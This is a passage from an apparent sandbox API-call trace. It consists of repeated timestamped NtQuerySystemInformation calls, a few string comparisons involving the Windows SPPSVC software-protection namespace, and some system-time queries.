(SystemInformationClass=0xb9, SystemInformation=0xa78207ca50, Length=0x20, ResultLength=0x0) [0286.508] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.508] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.508] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.508] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.508] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.508] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ced0, Length=0x50, ResultLength=0x0) [0286.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce50, Length=0x28, ResultLength=0x0) [0286.509] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0286.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ced0, Length=0x50, ResultLength=0x0) [0286.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ced0, Length=0x50, ResultLength=0x0) [0286.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ced0, Length=0x50, ResultLength=0x0) [0286.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce00, Length=0x38, ResultLength=0x0) [0286.516] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.516] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc30, Length=0x28, ResultLength=0x0) [0286.516] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.517] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.517] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc30, Length=0x28, ResultLength=0x0) [0286.517] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.517] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.517] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc30, Length=0x28, ResultLength=0x0) [0286.518] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.518] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.518] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cca0, Length=0x28, ResultLength=0x0) [0286.518] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.518] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.518] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce00, Length=0x38, ResultLength=0x0) [0286.519] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.519] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd20, Length=0x28, ResultLength=0x0) [0286.528] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.528] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.528] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.529] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.529] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.529] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.529] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd20, Length=0x28, ResultLength=0x0) [0286.530] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.530] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.530] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce00, Length=0x38, ResultLength=0x0) [0286.530] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc80, Length=0x20, ResultLength=0x0) [0286.531] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc00, Length=0x20, ResultLength=0x0) [0286.531] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.531] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc00, Length=0x20, ResultLength=0x0) [0286.531] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.532] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc00, Length=0x20, ResultLength=0x0) [0286.532] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.532] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.532] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.532] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.532] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce00, Length=0x38, ResultLength=0x0) [0286.532] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc80, Length=0x20, ResultLength=0x0) [0286.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc10, Length=0x20, ResultLength=0x0) [0286.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc10, Length=0x20, ResultLength=0x0) [0286.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ced0, Length=0x50, ResultLength=0x0) [0286.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce50, Length=0x28, ResultLength=0x0) [0286.534] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0286.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.535] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ced0, Length=0x50, ResultLength=0x0) [0286.535] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.535] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ced0, Length=0x50, ResultLength=0x0) [0286.535] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.535] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ced0, Length=0x50, ResultLength=0x0) [0286.535] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.535] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce00, Length=0x38, ResultLength=0x0) [0286.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc30, Length=0x28, ResultLength=0x0) [0286.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc30, Length=0x28, ResultLength=0x0) [0286.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc30, Length=0x28, ResultLength=0x0) [0286.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cca0, Length=0x28, ResultLength=0x0) [0286.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.544] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce00, Length=0x38, ResultLength=0x0) [0286.544] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.544] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd20, Length=0x28, ResultLength=0x0) [0286.551] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.551] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.552] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.552] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.552] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.552] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.552] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd20, Length=0x28, ResultLength=0x0) [0286.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce00, Length=0x38, ResultLength=0x0) [0286.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc80, Length=0x20, ResultLength=0x0) [0286.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc00, Length=0x20, ResultLength=0x0) [0286.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc00, Length=0x20, ResultLength=0x0) [0286.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.554] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc00, Length=0x20, ResultLength=0x0) [0286.554] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.554] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.554] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.554] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.554] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce00, Length=0x38, ResultLength=0x0) [0286.554] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc80, Length=0x20, ResultLength=0x0) [0286.554] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc10, Length=0x20, ResultLength=0x0) [0286.555] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.555] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.555] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.555] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc10, Length=0x20, ResultLength=0x0) [0286.555] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.555] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.555] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.555] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.555] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d0e8, Length=0x50, ResultLength=0x0) [0286.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d060, Length=0x28, ResultLength=0x0) [0286.556] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0286.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d0e8, Length=0x50, ResultLength=0x0) [0286.557] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.557] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d0e8, Length=0x50, ResultLength=0x0) [0286.557] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cfd0, Length=0x50, ResultLength=0x0) [0286.557] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf50, Length=0x28, ResultLength=0x0) [0286.557] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0286.557] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.557] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.557] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cfd0, Length=0x50, ResultLength=0x0) [0286.557] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.557] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cfd0, Length=0x50, ResultLength=0x0) [0286.558] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.558] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cfd0, Length=0x50, ResultLength=0x0) [0286.558] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.558] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf00, Length=0x38, ResultLength=0x0) [0286.698] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.699] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd30, Length=0x28, ResultLength=0x0) [0286.699] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.699] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.699] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd30, Length=0x28, ResultLength=0x0) [0286.699] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.699] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.699] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd30, Length=0x28, ResultLength=0x0) [0286.699] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.700] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.700] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cda0, Length=0x28, ResultLength=0x0) [0286.700] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.700] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.700] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf00, Length=0x38, ResultLength=0x0) [0286.700] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.701] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce20, Length=0x28, ResultLength=0x0) [0286.711] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.712] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.712] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.712] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.712] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.712] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.712] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce20, Length=0x28, ResultLength=0x0) [0286.712] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.713] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.713] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf00, Length=0x38, ResultLength=0x0) [0286.713] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd80, Length=0x20, ResultLength=0x0) [0286.713] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd00, Length=0x20, ResultLength=0x0) [0286.713] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.713] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd00, Length=0x20, ResultLength=0x0) [0286.713] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.713] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd00, Length=0x20, ResultLength=0x0) [0286.713] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.713] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.714] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.714] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.714] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf00, Length=0x38, ResultLength=0x0) [0286.714] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd80, Length=0x20, ResultLength=0x0) [0286.714] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd10, Length=0x20, ResultLength=0x0) [0286.714] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.714] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.714] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.714] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd10, Length=0x20, ResultLength=0x0) [0286.714] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.714] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.714] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.715] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.715] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.715] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.715] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xa78207d030 | out: lpSystemTimeAsFileTime=0xa78207d030*(dwLowDateTime=0x383b2707, dwHighDateTime=0x1d6666a)) [0286.715] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.715] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d0e8, Length=0x50, ResultLength=0x0) [0286.715] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d020, Length=0x28, ResultLength=0x0) [0286.715] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf38, Length=0x50, ResultLength=0x0) [0286.716] GetTickCount () returned 0x1187b77 [0286.716] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce08, Length=0x58, ResultLength=0x0) [0286.716] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.716] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd20, Length=0x38, ResultLength=0x0) [0286.719] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.719] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb50, Length=0x28, ResultLength=0x0) [0286.719] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.719] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.719] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb50, Length=0x28, ResultLength=0x0) [0286.719] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.719] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.720] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb50, Length=0x28, ResultLength=0x0) [0286.720] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.720] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.720] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb50, Length=0x28, ResultLength=0x0) [0286.720] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.720] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.720] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbc0, Length=0x28, ResultLength=0x0) [0286.720] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.720] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.720] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd20, Length=0x38, ResultLength=0x0) [0286.721] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.721] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc40, Length=0x28, ResultLength=0x0) [0286.724] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.724] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.724] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.724] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.724] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.725] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc40, Length=0x28, ResultLength=0x0) [0286.725] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.725] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.725] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd20, Length=0x38, ResultLength=0x0) [0286.725] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cba0, Length=0x20, ResultLength=0x0) [0286.725] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb20, Length=0x20, ResultLength=0x0) [0286.725] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.725] NtQuerySystemInformation 